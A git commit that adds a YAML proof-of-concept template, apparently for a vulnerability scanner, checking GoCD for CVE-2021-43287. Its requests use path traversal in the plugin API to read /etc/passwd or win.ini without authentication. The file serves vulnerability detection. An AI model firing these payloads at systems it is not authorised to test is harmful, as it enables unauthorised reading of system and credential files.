Add CVE-2021-43287 (chaitin#1487)

* Update and rename cve-2021-43287.yml to gocd-cve-2021-43287.yml * Update gocd-cve-2021-43287.yml Co-authored-by: smile-jpg <[email protected]>
li95 · Nov 10, 2021 · 4cc5e08 · 4cc5e08
1 parent 3018b8b
commit 4cc5e08
Showing 1 changed file with 25 additions and 0 deletions.
diff --git a/pocs/gocd-cve-2021-43287.yml b/pocs/gocd-cve-2021-43287.yml
@@ -0,0 +1,25 @@
+name: poc-yaml-gocd-cve-2021-43287
+manual: true
+transport: http
+rules:
+    linux0:
+        request:
+            cache: true
+            method: GET
+            path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd
+            follow_redirects: false
+        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+    windows0:
+        request:
+            cache: true
+            method: GET
+            path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini
+            follow_redirects: false
+        expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
+expression: windows0() || linux0()
+
+detail:
+    author: For3stCo1d (https://github.com/For3stCo1d)
+    description: "Gocd-file-read"
+    links:
+    - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover